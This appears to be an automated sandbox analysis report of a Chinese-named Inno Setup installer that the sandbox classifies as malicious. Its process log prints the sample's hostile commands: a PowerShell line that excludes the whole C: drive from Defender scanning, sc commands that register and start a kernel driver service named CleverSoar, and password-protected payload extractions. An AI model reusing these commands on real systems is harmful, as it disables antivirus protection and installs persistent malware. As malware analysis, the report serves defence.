Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.dr; String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.dr; String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.dr; String found in binary or memory: http://ocsp.digicert.com0A
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.dr; String found in binary or memory: http://ocsp.digicert.com0C
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.dr; String found in binary or memory: http://ocsp.digicert.com0H
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.dr; String found in binary or memory: http://ocsp.digicert.com0I
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.dr; String found in binary or memory: http://ocsp.digicert.com0X
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.dr; String found in binary or memory: http://www.digicert.com/CPS0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.dr; String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.dr; String found in binary or memory: http://www.metalinker.org/
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.dr; String found in binary or memory: http://www.metalinker.org/basic_string::_M_construct
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.dr; String found in binary or memory: https://aria2.github.io/
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.dr; String found in binary or memory: https://aria2.github.io/Usage:
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.dr; String found in binary or memory: https://github.com/aria2/aria2/issues
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.dr; String found in binary or memory: https://github.com/aria2/aria2/issuesReport
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe; String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1692948774.0000000002F40000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1693303041.000000007EBFB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000000.1694925449.0000000000E01000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000000.1786864198.0000000000DBD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.dr; String found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1692948774.0000000002F40000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1693303041.000000007EBFB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000000.1694925449.0000000000E01000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000000.1786864198.0000000000DBD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.dr; String found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: 01 00 00 00

System Summary

Source: update.vac.1.drStatic PE information: section name: .=~
Source: update.vac.6.drStatic PE information: section name: .=~
Source: hrsw.vbc.6.drStatic PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6BF43886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6BF43886
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C0C5120 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle,6_2_6C0C5120
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C0C5D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6C0C5D60
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6BF43A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6BF43A6A
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6BF439CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6BF439CF
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6BF43D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6BF43D62
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6BF43D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6BF43D18
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6BF43C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6BF43C62
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6BF41950: CreateFileA,DeviceIoControl,CloseHandle,6_2_6BF41950
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6BF44754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,6_2_6BF44754
Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Windows NT\hrsw.vbc 05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess token adjusted: Security
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00AD1E40 appears 82 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00B6FB10 appears 720 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00AD28E3 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: String function: 6C196F10 appears 415 times
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: String function: 6C0F9240 appears 31 times
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.5.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.5.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1693303041.000000007EEFA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.4.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1692948774.000000000305E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.4.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000000.1691567795.0000000000949000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.4.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.4.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.drBinary string: \Device\TfSysMon
Source: tProtect.dll.12.drBinary string: \Device\TfKbMonPWLCache
Source: classification engineClassification label: mal96.evad.winEXE@144/32@0/0
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C0C5D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6C0C5D60
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00AD9313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,10_2_00AD9313
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00AE3D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00AE3D66
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00AD9252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,10_2_00AD9252
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C0C5240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW,6_2_6C0C5240
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpFile created: C:\Program Files (x86)\Windows NT\is-F1F4B.tmp
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7376:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7380:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8052:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8116:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8156:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4960:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8128:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1456:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3748:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7856:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6036:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7828:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7696:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4476:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4856:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7844:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4488:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3272:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3940:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3052:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5476:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2312:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2520:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2056:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8168:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7400:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8100:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4956:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3384:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7944:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7684:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeFile created: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpFile read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.drBinary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.drBinary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeVirustotal: Detection: 9%
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeFile read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe
Source: unknownProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$20492,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe"
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$402A0,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENT
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
